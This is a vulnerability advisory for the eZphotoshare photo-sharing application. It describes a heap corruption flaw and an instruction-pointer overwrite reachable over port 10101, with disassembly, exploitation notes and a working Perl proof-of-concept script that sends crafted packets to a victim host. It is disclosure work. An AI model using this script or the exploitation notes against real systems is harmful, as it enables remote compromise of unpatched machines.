ezphotoshare.txt

`eZphotoshare Multiple Overflow Vulnerabilities  
  
##############################################  
  
Credit:  
Author : Peter Winter-Smith  
  
Software:  
Package : eZphotoshare  
Versions : All up to and including the latest verson  
Vendor : eZnetwork  
Vendor Url : http://www.ezphotoshare.com/  
  
Vulnerability:  
Bug Type : Multiple *Interesting* Overflows  
Severity : Moderately/Highly Critical  
+ Code Execution with Application Privileges  
+ Arbitrary Memory can be Overwritten  
  
1. Description of Software  
  
"eZphotoshare is an amazing new way to share Digital Photos over the   
Internet  
with friends and family. Seeing is believing, download it today and  
interactively share digital photos anytime, anywhere. It's FREE for home   
use."  
- Vendor's Description  
  
2. Bug Information  
  
(a). Heap Corruption Vulnerability  
  
By sending a packet of data of length 80 bytes to eZphotoshare on port 10101  
exactly eight times in a row, it is possible to overwrite the ecx and eax  
registers in memory when they are loaded from the esi pointer.  
  
The vulnerable code, which lies in the RtlAllocateHeap function in the   
module  
'ntdll.dll', is shown below:  
  
  
:77F580C9 mov eax, dword ptr [esi+08] ; eax contains our   
arbitrary  
; dword of data  
  
:77F580CC mov dword ptr [ebp+FFFFFF64], eax  
  
:77F580D2 mov ecx, dword ptr [esi+0C] ; ecx contains the next  
; arbitrary dword of data   
which  
; we supply  
  
:77F580D5 mov dword ptr [ebp+FFFFFF60], ecx  
  
:77F580DB mov dword ptr [ecx], eax ; write the contents of the   
eax  
; register to the address  
; referenced by the ecx  
; register!  
  
  
The packet structure should be as follows:  
  
$packet = "GET /aaa" . $eax . $ecx . "a"x64;  
  
Where $eax and $ecx are four bytes exactly in length.  
  
This type of flaw could, amongst other things, allow a remote attacker to  
overwrite a saved return address on the target system and thus open the  
possibility of remote code execution with the privileges of the user running   
the  
application.  
  
  
(b). Overwriting of Important Saved Values  
  
By sending an overly long packet of data to eZphotoshare on port 10101 it is  
possible to overwrite some important saved values in the system memory which   
can  
be crafted to lead to complete control over the instruction pointer.  
  
The vulnerable code lies in 'mfc42.dll' and is shown below:  
  
  
:73DD1C3D mov edi, dword ptr [ebp+08] ; [ebp+08] points to a   
pointer  
; to our user supplied data  
  
...  
  
:73DD1C62 push [ebp+18]  
:73DD1C65 mov eax, dword ptr [edi] ; the value pointed at by the   
edi  
  
; register comes directly from our user supplied data, therefore the eax  
; register now contains anything we wish it to (even nulls!)  
  
...  
  
:73DD1C6D FF90A0000000 call dword ptr [eax+000000A0] ; whammo!   
the  
  
; execution flow is directed to the address contained at, eax plus a0h.   
To  
; gain control of the instruction pointer we just need to point to an  
; address containing the instruction pointer which we would like to use  
; (remembering to subtract a0h from the pointer address), and we have   
full  
; control of the eip register!  
  
  
Exploitation Notes:  
  
I have been able to execute code through the flaws found in eZphotoshare,  
despite the apparent complications which arise when it comes to   
exploitation,  
and therefore I would urge you to take measures to protect your systems if   
you  
use this software, whatever those measures may be.  
  
3. Proof of Concept Code  
  
I have decided not to release my remote code execution exploits for the  
mentioned flaws until the vendor has had a fair amount of time to patch   
their  
software. Instead I am going to release a proof of concept code which will  
demonstrate the heap corruption vulnerability.  
  
I am not going to release code for the Important Value Overwrite   
vulnerability,  
since it is pretty straightforward to reproduce and is best just   
demonstrated  
with netcat or the like.  
  
For best results, attach the windbg utility to eZphotoshare before using   
this  
proof of concept code, so that you can see the attack and its results in  
realtime.  
  
#   
---------------------------------[eZpsheap.pl]--------------------------------  
#  
#!/usr/bin/perl -w  
#  
# Heap Corruption Vulnerability in eZphotoshare PoC  
# - by Peter Winter-Smith [[email protected]]  
  
use IO::Socket;  
  
if(!($ARGV[0]))  
{  
print "Usage: eZpsheap.pl <victim>\n\n";  
exit;  
}  
  
print "Heap Corruption PoC\n";  
  
for($n=1;$n<9;$n++){  
  
$victim = IO::Socket::INET->new(Proto=>'tcp',  
PeerAddr=>$ARGV[0],  
PeerPort=>"10101")  
or die "Unable to connect to $ARGV[0] on port  
10101";  
  
$eax = "ABCD";  
$ecx = "XXXX";  
  
$packet = "GET /aaa" . $eax . $ecx . "a"x64;  
  
print $victim $packet;  
  
print " + Sending packet number $n of 8 ...\n";  
  
sleep(1);  
  
close($victim); }  
  
print "Done.\n";  
exit;  
  
#   
------------------------------------------------------------------------------  
  
  
4. Patches - Workarounds  
  
No known patches have been issued. Secunia often have pretty sufficient  
workarounds, so I would recommend that you check their 'solutions' on  
www.secunia.com if you want a professional opinion.  
  
5. Credits  
  
The discovery, analysis and exploitation of this flaw is a result of  
research carried out by Peter Winter-Smith. I would ask that you do not   
regard  
any of the analysis to be 'set in stone', and that if investigating this   
flaw  
you back trace the steps detailed earlier for yourself.  
  
Greets and thanks to:  
David and Mark Litchfield, JJ Gray (Nexus), Todd and all the packetstorm  
crew, Luigi Auriemma, Bahaa Naamneh, sean(gilbert(perlboy)), pv8man, nick   
k.,  
Joel J. and Martine.  
  
Huge thanks to everyone who makes this industry as great as it is, and puts   
up  
with all my ever so vague and technically questionable contributions ;o)  
  
Brett Moore - Are you *trying* to break Microsoft? ;o) ;o(  
  
o This document should be mirrored at:  
- http://www.elitehaven.net/ezphotoshare.txt  
  
_________________________________________________________________  
Hotmail messages direct to your mobile phone http://www.msn.co.uk/msnmobile  
`